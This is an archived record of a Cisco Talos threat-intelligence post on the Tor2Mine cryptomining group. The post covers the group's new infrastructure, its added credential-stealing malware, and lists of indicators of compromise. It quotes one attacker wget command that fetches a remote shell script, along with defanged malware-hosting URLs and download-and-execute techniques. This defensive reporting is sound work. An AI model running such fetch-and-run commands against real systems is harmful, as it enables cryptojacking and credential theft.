{
	"id": "a319dbcc-da0c-439b-b8e0-7de910eafcfb",
	"created_at": "2026-04-06T00:12:46.552628Z",
	"updated_at": "2026-04-10T03:22:08.510779Z",
	"deleted_at": null,
	"sha1_hash": "899c41007672343b209d952fe15ec2f3e77f4aa2",
	"title": "Tor2Mine is up to their old tricks — and adds a few new ones",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 690147,
	"plain_text": "Tor2Mine is up to their old tricks — and adds a few new ones\r\nBy Joe Marshall\r\nPublished: 2020-06-11 · Archived: 2026-04-05 19:23:35 UTC\r\nThursday, June 11, 2020 14:53\r\nBy Kendall McKay and Joe Marshall.\r\nThreat summary\r\nCisco Talos has identified a resurgence of activity by Tor2Mine, a cryptocurrency mining group that was\r\nlikely last active in 2018. Tor2Mine is deploying additional malware to harvest credentials and steal more\r\nmoney, including AZORult, an information-stealing malware; the remote access tool Remcos; the\r\nDarkVNC backdoor trojan; and a clipboard cryptocurrency stealer.\r\nThe actors are also using a new IP address and two new domains to carry out their operations.\r\nThe addition of new tactics, techniques, and procedures (TTPs) suggests Tor2Mine is seeking ways to\r\ndiversify their revenue in a volatile cryptocurrency market.\r\nWhat’s new?\r\nTor2Mine has traditionally been a cryptocurrency mining malware actor notorious for infecting victims with\r\ncryptominers that steal system resources to mine currency. In a new development, the Tor2Mine actors have\r\nincorporated additional malware into their operations, likely as a way to diversify revenue streams and stay\r\nrelevant in a COVID-19 world where cryptocurrencies are fluctuating wildly.\r\nSo what?\r\nBetween January and June 2020, Cisco Talos observed resurgent activity from Tor2Mine, a profit-driven actor that\r\nremains active despite a global economic recession and volatile cryptocurrency market. To address these\r\nchallenges, Tor2Mine, a group traditionally known to deliver cryptocurrency mining malware, has begun using\r\nadditional malware to harvest victims’ credentials and steal more money. The addition of new TTPs, as well as the\r\nuse of new infrastructure, highlights Tor2Mine’s resilience in a challenging threat environment. 
These\r\ndevelopments also underscore threat actors’ persistence more broadly and should serve as a reminder that\r\norganizations must maintain heightened security at all times.\r\nWhat makes the Tor2Mine group notable is their use of Tor2web for command and control (C2) for their malware\r\ninfections. The Tor2web services act as a bridge between the internet and the Tor network, a system that allows\r\nusers to enable anonymous communication. These services are useful for malware authors because they eliminate\r\nthe need for malware to communicate with the Tor network directly, which is suspicious and may be blocked, and\r\nallow the C2 server's IP address to be hidden.\r\nhttps://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html\r\nPage 1 of 7\n\nAnalysis\r\nTalos recently identified activity in our endpoint telemetry associated with Tor2Mine affecting at least six different\r\ncompanies. The activity has been ongoing since January 2020, resurfacing after a likely year-long hiatus since we\r\nfirst identified the threat actor in December 2018. While much of the infrastructure remains the same, we\r\nidentified a new IP and two domains that we assess are currently being leveraged by Tor2Mine. During the course\r\nof our research, we also discovered evidence suggesting that the Tor2Mine actors are deploying additional\r\nmalware in tandem with XMRig during their operations to harvest credentials and steal more money. The new\r\nmalware includes AZORult, an information-stealing malware; the remote access tool Remcos; the DarkVNC\r\nbackdoor trojan; and a clipboard cryptocurrency stealer.\r\nTor2Mine resurfaces\r\nIn much of this recent activity, the actors use previously identified infrastructure to carry out their operations. In\r\none cluster of activity against a telecommunications company, we observed the attacker executing PowerShell\r\ncommands to download files from multiple Tor2Mine-related domains. 
The attacker attempts to run Microsoft\r\nHTML Applications (HTA) from multiple URLs (listed below) using Mshta, a utility for executing HTA files:\r\nhxxps[:]//qm7gmtaagejolddt[.]onion[.]to/check[.]hta\r\nhxxp[:]//res1[.]myrms[.]pw/upd[.]hta\r\nhxxp[:]//eu1[.]minerpool[.]pw/check[.]hta\r\nThe qm7gmtaagejolddt[.]onion[.] domain is a known Tor2web\r\ngateway used by Tor2Mine actors to proxy communications. According to our previously mentioned blog,\r\nthe actors have been using this domain since at least 2018. The res1[.]myrms[.]pw domain also appears to\r\nhave connections to Tor2Mine, as it is hosted on an IP address (107[.]181[.]187[.]132) previously known to\r\nbe used by Tor2Mine actors. In the activity outlined in our 2018 blog, Tor2Mine actors used a PowerShell\r\nscript to install follow-on malware onto the compromised system from this same IP. The\r\neu1[.]minerpool[.]pw domain, also hosted on 107[.]181[.]187[.]132, is the same mining pool the actors used in the\r\n2018 activity.\r\nThe actor also used a PowerShell command to download a .ps1 file from\r\nhxxp[:]//v1[.]fym5gserobhh[.]pw/v1/check1[.]ps1. The v1[.]fym5gserobhh[.]pw domain is hosted on the same\r\naforementioned IP. According to Umbrella data, v1[.]fym5gserobhh[.]pw and eu1[.]minerpool[.]pw are registered\r\nunder two different reg[.]ru nameservers (ns2[.]reg[.]ru and ns1[.]reg[.]ru).\r\nNew infrastructure identified\r\nWhile we identified many of the same domains and IP addresses being used from 2018 in this more recent\r\nactivity, we also identified several new indicators of compromise (IOCs) that were not previously associated with\r\nTor2Mine. In similar activity related to another company in mid-May, we saw the actors using Mshta to execute\r\nHTA files from many of the same URLs mentioned above. 
However, we also observed a new domain,\r\neu1[.]ax33y1mph[.]pw, in activity affecting an environmental consulting company between April and May 2020.\r\nThe domain is hosted on the same 107[.]181[.]187[.]132 IP address and was first seen in March 2020, according\r\nto Umbrella, suggesting this is a relatively new component of the attacker’s infrastructure.\r\nUmbrella data showing the DNS resolution information for eu1[.]ax33y1mph[.]pw\r\nAs our research progressed, we continued to identify related threat activity against several more companies\r\ninvolving the use of new Tor2Mine infrastructure. We identified a new IP, 185[.]10[.]68[.]147, hosting at least two\r\ndomains, asq[.]r77vh0[.]pw and asq[.]d6shiiwz[.]pw, that we assess are part of Tor2Mine’s infrastructure. The\r\nasq[.]r77vh0[.]pw domain is registered under the same two previously mentioned reg[.]ru providers. It first\r\nappeared in our endpoint telemetry for two days in July 2019 but did not reappear until late February 2020. This\r\ndomain was previously hosted on 107[.]181[.]160[.]197, an IP used by Tor2Mine actors, according to our 2018\r\nblog.\r\nThe asq[.]r77vh0[.]pw domain also has at least one referring file\r\n(67f5f339c71c9c887dfece5cb6e2ab698b8c8a575d1ab9dd37ac32232be1aa04) that reaches out to both the older\r\n107[.]181[.]160[.]197 IP and the newly identified 185[.]10[.]68[.]147 IP, bolstering the notion that\r\n185[.]10[.]68[.]147 is an extension of Tor2Mine’s infrastructure.\r\nCisco Umbrella showing a spike in DNS requests for asq[.]r77vh0[.]pw.\r\nThe asq[.]d6shiiwz[.]pw domain is also registered under the same two reg[.]ru hosting providers. According to\r\nVirusTotal, this domain has hosted several URLs that are lexically similar to previously identified Tor2Mine\r\nURLs, such as those ending in “.hta” and “checking.ps1”. 
Two such examples are\r\nhxxp[:]//asq[.]d6shiiwz[.]pw/win/hssl/d6[.]hta and hxxps[:]//asq[.]d6shiiwz[.]pw/win/checking[.]ps1. Both\r\ndomains were also previously hosted on the same IP address, 195[.]123[.]234[.]33, which also hosts malicious\r\npayloads associated with XMRig.\r\nWe first observed these domains being hosted on 185[.]10[.]68[.]147 on March 15, 2020, according to Umbrella,\r\nand they remain associated as of this writing. This IP also hosts fh[.]fhcwk4q[.]xyz, a domain associated with\r\nXMRigCC, a variant of XMRig leveraged by many different threat actors. In addition to these domains, we also\r\nfound several URLs hosted on 185[.]10[.]68[.]147 in VirusTotal that are structurally similar to many of the\r\naforementioned Tor2Mine URLs, such as hxxp[:]//185[.]10[.]68[.]147/win/update[.]hta and\r\nhxxp[:]//185[.]10[.]68[.]147/win/del[.]ps1. As previously noted, Tor2Mine actors were observed using PowerShell\r\ncommands to download .ps1 files and Mshta to execute .hta files.\r\nThe IP also has a communicating Shell script file\r\n(4d21cab49f7d7dd7d39df72b244a249277c37b5561e74420dfc96fb22c8febac). The content of this file includes a\r\nstring with a wget request to hxxp[:]//asq[.]r77vh0[.]pw/lin/update[.]sh. From there, we identified a file\r\n(daa768e8d66aa224491000e891f1ef2cb7c674df2f3097fef7db90d692e2f539) in VirusTotal whose content shows\r\nan identical wget request (“wget --user-agent \"linux\" -q -O - hxxp://asq[.]r77vh0[.]pw/lin/update[.]sh”). This file\r\nreaches out to the aforementioned 195[.]123[.]234[.]33, an XMRigCC IP that previously hosted the newly\r\nidentified domains, according to VirusTotal and Umbrella, respectively.\r\nFile containing the Tor2Mine IP and domain.\r\nUsing the same approach, we identified several other files that also had this string in their contents. 
One such file,\r\n3c2d83b9e9b1b107c3db1185229865b658bbaebc8020c1b2a4f9155ca87858fc, has embedded URLs that are hosted\r\non 107[.]181[.]187[.]132 (e.g., hxxp[:]//107[.]181[.]160[.]197/lin/32/xmrig), which we previously mentioned is a\r\nknown Tor2Mine IP. These connections to the older Tor2Mine infrastructure further suggest that\r\n185[.]10[.]68[.]147 is a new IP used by the same actors.\r\nNew malware added to the mix\r\nDuring the course of our research, we discovered evidence suggesting that the Tor2Mine actors are deploying\r\nAZORult and other malware in tandem with XMRig during their operations to harvest credentials and steal more\r\nmoney. Our previous research from April 2020 outlined a complex campaign with several different executable\r\npayloads focused on obtaining money for the attackers. The campaign included the use of a variant of AZORult,\r\nan information-stealing malware; as well as the RAT Remcos; the DarkVNC backdoor trojan; and a clipboard\r\ncryptocurrency stealer. Much of the infrastructure mentioned in the April blog overlaps with many of the new\r\nTor2Mine IOCs we identified. According to the blog, there were several domains referenced in the configuration\r\nfor an XMRigCC payload during these campaigns, including eu[.]minerpool[.]pw and rs[.]fym5gserobhh[.]pw,\r\nboth lexically similar to the eu1[.]minerpool[.]pw and v1[.]fym5gserobhh[.]pw domains we discovered in our\r\nrecent research. The configuration also mentioned 185[.]10[.]68[.]220, our newly identified Tor2Mine IP. In\r\naddition to these similarities, the April blog also mentions the AZORult actors downloading XMRig from\r\n195[.]123[.]234[.]33, which previously hosted the two newly identified Tor2Mine domains, asq[.]r77vh0[.]pw and\r\nasq[.]d6shiiwz[.]pw. Furthermore, these two domains were also used by the actors outlined in the April blog. 
The\r\nURLs associated with these domains are structurally similar to many of the URLs we observed during the course\r\nof our recent Tor2Mine discoveries, including hxxps://asq[.]r77vh0[.]pw/win/checking[.]ps1 and\r\nhxxps://asq[.]d6shiiwz[.]pw/win/hssl/d6[.]hta.\r\nThe likely addition of AZORult and additional malware to Tor2Mine’s tactics, techniques, and procedures (TTPs)\r\nshows that the actors remain active and continue to look for ways to update their capabilities to increase their\r\nmonetary gain. Notably, the Tor2Mine activity from this year is consistent with a general uptick in cryptocurrency\r\nminers observed by Talos over the last several months, including a resurgence in PowerGhost and MyKings.\r\nThe big picture\r\nMany bad actors, like Tor2Mine, who distribute malware for profit often have operational challenges that are\r\nsimilar to many legitimate global enterprises, such as product creation, distribution, overhead, infrastructure,\r\nsupply chain and resilient revenue streams. As we have seen in the Tor2Mine activity, financially motivated cyber\r\nthreat actors will continue to reinvent themselves and find new methods of generating revenue, as their survival\r\ndepends on it. If cryptominers cease to be profitable enough for the operators, bad actors will probably diversify\r\ntheir attack portfolios to include even more dangerous threats like ransomware. Ultimately, just as organizations\r\nhave to adapt to a continually changing environment to stay in business, malware distribution groups must also\r\nremain agile and respond to new challenges.\r\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these\r\nthreat actors. 
Exploit Prevention present within AMP is designed to protect customers from unknown attacks such\r\nas this automatically.\r\nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious\r\nwebsites and detects malware used in these attacks.\r\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention\r\nSystem (NGIPS), Cisco ISR, and Meraki MX can detect malicious activity associated with this threat.\r\nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs,\r\nwhether users are on or off the corporate network.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nIOCs\r\nDomains\r\nv1[.]fym5gserobhh[.]pw\r\nres1[.]myrms[.]pw\r\neu1[.]minerpool[.]pw\r\neu1[.]ax33y1mph[.]pw\r\nasq[.]r77vh0[.]pw\r\nasq[.]d6shiiwz[.]pw\r\nIPs\r\n107[.]181[.]187[.]132\r\n185[.]10[.]68[.]147\r\n195[.]123[.]234[.]33\r\nURLs\r\nhxxp[:]//v1.fym5gserobhh.pw/php/func.php\r\nhxxp[:]//v1.fym5gserobhh.pw/v1/check1.ps1\r\nhxxp[:]//eu1.minerpool.pw/check.hta\r\nhxxp[:]//eu1.minerpool.pw/upd.hta\r\nhxxp[:]//eu1.minerpool.pw/rckl/check.hta\r\nhxxp[:]//res1.myrms.pw/upd.hta\r\nhxxps[:]//eu1.ax33y1mph.pw/check.hta\r\nhxxps[:]//qm7gmtaagejolddt.onion.to/check.hta\r\nhxxps[:]//asq.r77vh0.pw/win/hssl/r7.hta\r\nhxxps[:]//asq.r77vh0.pw/win/php/func.php\r\n
hxxp[:]//asq.r77vh0.pw/win/checking.hta\r\nhxxp[:]//asq.d6shiiwz.pw/win/hssl/d6.hta\r\nhxxps[:]//asq.d6shiiwz.pw/win/checking.ps1\r\nhxxp[:]//107.181.160.197/lin/32/xmrig\r\nhxxp[:]//185.10.68.147/win/update.hta\r\nhxxp[:]//185.10.68.147/win/del.ps1\r\nqm7gmtaagejolddt.onion.to\r\nFile hashes\r\n67f5f339c71c9c887dfece5cb6e2ab698b8c8a575d1ab9dd37ac32232be1aa04\r\n4d21cab49f7d7dd7d39df72b244a249277c37b5561e74420dfc96fb22c8febac\r\n3c2d83b9e9b1b107c3db1185229865b658bbaebc8020c1b2a4f9155ca87858fc\r\ndaa768e8d66aa224491000e891f1ef2cb7c674df2f3097fef7db90d692e2f539\r\nSource: https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html"
	],
	"report_names": [
		"tor2mine-is-up-to-their-old-tricks-and_11.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434366,
	"ts_updated_at": 1775791328,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/899c41007672343b209d952fe15ec2f3e77f4aa2.pdf",
		"text": "https://archive.orkl.eu/899c41007672343b209d952fe15ec2f3e77f4aa2.txt",
		"img": "https://archive.orkl.eu/899c41007672343b209d952fe15ec2f3e77f4aa2.jpg"
	}
}